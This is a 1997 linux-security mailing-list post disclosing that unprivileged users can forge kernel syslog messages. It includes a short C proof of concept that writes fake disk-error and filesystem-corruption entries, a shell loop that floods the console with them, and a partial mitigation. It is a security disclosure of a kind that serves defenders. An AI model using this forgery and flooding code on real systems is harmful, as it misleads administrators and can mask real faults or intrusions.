[1454] in linux-security and linux-alert archive

home help back first fref pref prev next nref lref last post

[linux-security] Abuse of the syslog facility

daemon@ATHENA.MIT.EDU (Paul Gortmaker)
Wed Feb 19 13:45:46 1997

From: Paul Gortmaker <gpg109@rsphy6.anu.edu.au>
To: linux-security@redhat.com
Date: Wed, 19 Feb 1997 18:42:46 +1100 (EST)
Resent-From: linux-security@redhat.com
Reply-To: linux-security@redhat.com


Any unpriveledged user can abuse the syslog facility in an interesting
way. The following example is a good one that can put misleading
information in the logs.

-------------------------------
#include <syslog.h>

void main(void){

	const char *mesg1 = "hda: read_intr: status=0x59 { SeekComplete
DataRequest Error } { UncorrectableError }, CHS=157/2/9, sector=2826\0";
	const char *mesg2 ="end_request: I/O error, dev 03:00, sector 2826\0";
	const char *mesg3 = "EXT2-fs: group descriptors corrupted !\0";

	openlog("kernel", LOG_CONS, LOG_KERN);
	syslog(LOG_ERR, mesg1);
	syslog(LOG_ERR, mesg2);
	syslog(LOG_ERR, mesg3);
	closelog();
}
---------------------------------

If one does "chmod o-rw /dev/log" that stops the above message from ending
up in the log. However if the user runs the above in a tight loop, 
i.e. "while true; do fake_message;done" then syslogd apparently can't
keep up and by definition of LOG_CONS (man 3 syslog) one has:

       LOG_CONS
              write directly to system console  if  there  is  an
              error while sending to system logger

and hence the console gets *flooded* with fake messages. This was with
RH v4.1 but I suspect general applicability.

Not a deadly security threat, but I thought I'd mention it. 

Paul.


home help back first fref pref prev next nref lref last post